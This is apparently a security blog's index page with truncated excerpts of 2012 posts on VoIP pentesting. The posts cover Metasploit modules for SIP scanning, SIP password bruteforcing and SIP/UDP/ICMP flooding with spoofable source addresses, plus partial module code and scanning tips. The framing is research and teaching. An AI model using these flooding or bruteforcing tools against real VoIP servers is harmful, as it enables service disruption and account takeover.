Skip to main content

Posts

Showing posts from 2012

Fixing some SIP related Metasploit modules

Hi again, while I was checking some demos for our class at Vigo University representing Quobis  I noticed that Metasploit options.rb module (SIP scanning) wasn't working ok. I mean, it was unable to recognize a Kamailio server. Next two pictures show the difference with SIPVicious output: Some time ago, I wrote a post about this module and I remember being a bit surprised because the code doesn't respect SIP protocol at all (but It worked with Asterisk). After a quick view to Kamailio logs my suspects were confirmed, Sanity module was doing right its job dropping these packets. :) Next function defines how requests are created in actual module, If you are familiar with SIP RFC  you probably will notice what I'm talking about. If not, I suggest you to compare it with my  create_request  function of sipflood.rb module.     def create_probe(ip)         suser = Rex::Text.rand_text_alphanumeric(rand(8)+1)         shost = Rex::Socket.source_addr

VoIP class at Vigo University

My colleague Antón ( @AntonRoman ) and myself visited last Monday the Telecommunication Engineering School at Vigo University in order to give a talk about VoIP, technologies and project that we’re involved in Quobis . As the year before, we were invited by the professor of the subject  “ Switching laboratory”. , Martín López Nores , to prepare a Kamailio practical exercise. Antón started explaining some basic VoIP concepts and then he went through more advanced ones mainly focused in Kamailio SIP server ( slides ).Then, I made a review and a demo of the most common VoIP vector attacks that we found every day “in the wild” and their available countermeasures ( slides ). As the last course, we extended the mandatory practice with an optional exercise (you can download them from the links below): - 2011-2012 - 2012-2013 We encourage the students to give it a try, I strongly think this practice could be very useful for their professional future. In fact,  An

Bruteforcing SIP extensions with Metasploit

Hi, some time ago I published this post about VoIP information gathering with Metasploit. For a minimal pentesting process, a module capable of bruteforcing discovered extensions password is needed. So I have developed it, if you know SIPvicious suite this module provides sipcrack tool features. Based on available SIP related modules I implemented SIP Digest Authentication algorithm and Msf::Auxiliary::AuthBrute mixin does the magic with possible user/password combinations. This picture shows an example of use in which extension 100 password is discovered ( 100 ). Source code: UDP version TCP version In case you use the module outside a LAN is strongly recommended to add you external IP address (option "EXTIP"), trying to avoid SIP and NAT problems. Bye ;)

Flooding Asterisk, Freeswitch and Kamailio with Metasploit

Hi, it has been a long time since my last post because of my new job and my final year project ("VoIP denegation of service attacks" for curious) but there is something I found during my tests with  Freeswitch ,  Kamailio  and  Asterisk  that I want to share. NOTE: Really, guys of  Security By Default  blog published us (my good friend Roi Mallo and me) two articles about how to develop modules for Metasploit framework, another two are coming.  ;) During my project, among others, I developed a Metasploit module which can flood SIP protocol with common frames (INVITE, OPTIONS, REGISTER, BYE), I wrote it at Quobis (nice job ;) in order to use it for some private tests because actual software didn´t fit our needs, so we are going to probe how is the behavior of different GPL VoIP servers against this kind of attacks: - Asterisk: I think it needs no introduction, the famous softswitch/PBX software. - Freeswitch: It´s a newer softswitch that seems to be Asterisk replacement

Scanning the world with Sipvicious

Hi, I´m scanning a large number of ranges with Sipvicious (" svmap.py ") and I would like to share some tips which helped me during the process: - The use of sessions (-s) and reports ("svreport.py") is necessary to prevent mixing of obtained data. - It´s a good idea to scan not only port 5060, you should add successive ports because some sysadmins configure their SIP services to run there (-p5060-5065). - There is a well known "problem" about SIP and NAT, if you have installed an Asterisk you have heard about it sure :(, so we need to specify our external IP address to Sipvicious with (-x) parameter. Moreover port 5060(Sipvicious outcoming port) has to be forwarded to host which is scanning, in case that you were scanning with more than one instance at the same time successive ports should be forwarded too. I usually put the host int the DMZ trying to avoid these problems. - "svreport.py" tries to make a DNS lookup with the discovered

Another simple Metasploit module: ICMP Flooder

Hi again!, I said I was going to develope VoIP related Metasploit modules but I was reading PacketFu documentation and I found that wrinting an ICMP flooder couldn´t be too complicated at this point. So I share this code too, I decided to include SHOST and SIZE options too trying to get a more flexible module able to make different flavors of this attack as Ping flood , Smurf or Ping of death . Next pictures show the module in  the same way of last post. Code: ------------------------------------------------------------------------- require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture def initialize super( 'Name' => 'ICMP Flooder', 'Description' => 'A simple ICMP flooder', 'Author' => 'Jesus Perez', 'License'     => MSF_LICENSE, 'Version' => '$Revision: 0 $' ) register_opt

My first Metasploit module: UDP Flooder

There are  very few Metasploit modules , neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a UDP flooder Aux. module, which is very simple but perfect for learning, UDPFlooder  is one of the many tools covered in "Hacking VoIP Exposed"  book, considered a reference in this field. Code: ------------------------------------------------------------------------- require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture def initialize super( 'Name' => 'UDP Flooder', 'Description' => 'A simple UDP flooder', 'Author' => 'Jesus Perez', 'License'     => MSF_LICENSE, 'Version' => '$Revision: 0 $' ) register_options( [ Opt::RPORT(5060), OptAddress.new('SHOST', [false, 'The spoofable sourc